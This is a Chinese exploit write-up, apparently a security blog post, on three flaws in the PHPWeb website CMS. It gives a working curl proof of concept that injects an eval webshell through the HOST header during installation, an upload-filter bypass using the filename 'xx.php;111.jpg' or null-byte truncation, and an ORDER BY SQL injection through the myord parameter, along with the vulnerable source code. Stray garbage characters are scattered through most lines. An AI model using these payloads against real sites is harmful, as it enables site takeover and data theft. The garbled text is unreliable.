phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

$ }* d6 o# u& |* y6 O8 c$ @之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
- e6 i! }2 c' ~0 G: g鸡肋2： 有一定安全常识的站长都会删掉 install 目录
) m- T) ~+ S0 r# V
* n" F; g2 o9 n虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响
' \- e6 |8 l! a- K& `) [) Y
分析：

/ H, K6 {/ K  Z7 ]0 a( r
$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
$ w' r4 c! e! w: ~                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
( l/ [3 ^; e7 z* Q  K3 F  |                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
1 Q7 l+ r% i# G+ t; G) h- v                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
4 Y4 ^$ q# m+ r+ ?& s                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

1 g0 {; C) ], H- Fpoc：
; i* l( F8 A8 O( D$ m! u
?
1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库

; F0 z# K$ x# G6 R! D9 i——————————————————–
+ E2 b0 H5 ~- }上传漏洞(需要进后台)：
3 {& T& s. G5 ?' p  p' B$ g' B+ u漏洞文件: /kedit/upload_cgi/upload.php
7 O& U2 ?# ^! h( X; C/ u9 h# C  I7 N3 S这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
, Y  [9 s- l4 y& R

. z9 S  X+ h' a  v. o  z- Y<?php
2 D6 r  Q% J) _9 `; {# S    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
/ Y6 W/ b' q7 ~  ~- c    NeedAuth(0);

, ?2 [7 Z/ a2 L! r& A1 f& N: f    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
7 i& p8 h4 }7 E8 T, c- b    }

    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
. R1 e: r& }! R3 P0 u& o% I    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';
/ z* F) o" E+ o+ v4 {4 x+ O$ z% Q
    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

3 d1 c* o( Y4 V, m  ]% \9 ?) S    //最大文件大小
4 w$ N! g$ W* r+ c" P0 K    $max_size = 1000000;
. S: R% A8 q; q0 N+ t7 `6 ?" U
    //更改目录权限
0 Z- r7 v0 T7 Y; p9 v2 T    @mkdir($save_path, 0777);

6 C( ], ]  T. b- Y" W# ^0 ^    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名

    //文件URL
    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
    if (empty($_FILES) === false) {

; v3 |6 M# {+ {" H: A            //原文件名
9 H7 O/ n5 `/ E0 Q+ C3 [  N            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
$ ~" n$ R7 m+ O5 o: y, A' o  G            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
            $file_size = $_FILES['fileData']['size'];
            //检查目录
! ~& i8 A. x2 f            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
* v6 Q8 i: ?) H; i3 F) q            }
            //检查目录写权限
1 B: e& ~: q" y. q" a            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
" J2 r6 q% K( P# P2 f            }
            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
9 S1 i" X3 }' f5 }/ U  S! e7 u                    alert("临时文件可能不是上传文件。");
$ E5 H; B7 y- v$ y) x            }
            //检查文件大小
            if ($file_size > $max_size) {
( I+ U9 ]' a  y& i$ p- w                    alert("上传文件大小超过限制。");
% C( o1 H1 V% X# D            }
            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
- I# ?8 R1 {, D% s8 q0 P7 d7 B            $file_ext = array_pop($temp_arr);
            $file_ext = trim($file_ext);
! z7 N% o! b- f+ L5 n4 y            $file_ext = strtolower($file_ext);
: e" ^& e6 I2 X4 @2 g
; {3 z. L' b6 ~6 R            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
$ W0 p6 W4 D2 }' `            }

            //移动文件   
$ Y! z* M% Y4 y' t            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
- C. G1 O9 G( G            if (move_uploaded_file($tmp_name, $file_path) === false) {
* [& _" q5 f# K# d                    alert("上传文件失败。");
            }

            @chmod($file_path,0666);

/ X& e- q) S$ W' N: _6 n    ?>
抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
' W& Z" m' r5 S
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过
, Z. i5 x" P, w( z
* ]1 i0 _# n1 w3 J# {1 O——————————————————
9 i- ?4 s- N- R; d/ f$ ^注入漏洞：
' T! F! u3 V$ _  m* q/ g漏洞文件:search/module/search.php
2 _( y- G1 `/ w2 z7 r/search/index.php?key=1&myord=1 [sqlinjection]
  F/ N0 M2 \  i* k* ~+ a
: e! X" J" p7 q. U& f1 m- K
<?php
   //       ... 省略 n 行...
8 g* N* l1 t4 L" j* J   //第18行:
  C& Y3 r0 j' j8 |; ]$ x. T           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
& I/ T0 Q9 G8 E2 o           $page=htmlspecialchars($_GET["page"]);
; c3 s! Q% V2 F* f! q, @# _0 i           $myord=htmlspecialchars($_GET["myord"]);

   //       ... 省略 n 行...
- n5 p) w- _5 ^5 `7 T: d% B   $key,$myord 两个参数带入查询
   //第47行 $key:
" h# a% g. W1 w: w2 m
( l8 n6 D% Q7 U9 e  g+ M  N  ~. t   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
8 L. R" N# f) c3 y* H: j
) ^+ j6 E0 W& q2 A, B0 T: A   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入

   ?>